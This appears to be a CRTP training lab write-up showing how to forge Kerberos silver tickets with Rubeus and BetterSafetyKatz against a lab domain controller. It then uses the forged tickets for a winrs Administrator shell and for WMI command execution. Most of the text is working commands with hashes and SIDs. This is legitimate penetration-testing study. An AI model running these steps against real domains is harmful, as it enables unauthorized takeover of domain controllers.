# CRTP Lab 9 ## Task 1 Try to get command execution on the domain controller by creating silver ticket for: * HTTP * WMI Use the NTLM or AES hash of dcorp-dc to forge and import ticket: Here, we use Rubeus for HTTP service. {% code overflow="wrap" %} ``` # ArgSplit for "silver" C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt ``` {% endcode %} Since the ticket is imported, we can get a shell as DC and execute commands. ``` C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd C:\Users\Administrator>set username set username USERNAME=Administrator C:\Users\Administrator>set computername set computername COMPUTERNAME=DCORP-DC ``` Let's also use SafetyKatz for WMI. To access WMI, we need two tickets, one for HOST and another for RPCSS. Let's get one for HOST first: {% code overflow="wrap" %} ``` C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` {% endcode %} Now for RPCSS: {% code overflow="wrap" %} ``` C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` {% endcode %} We can now check if the tickets are imported using `klist` ``` klist ``` We can now run WMI commands on DC. ``` # Run InviShell C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat # Run WMI command on DC PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc ```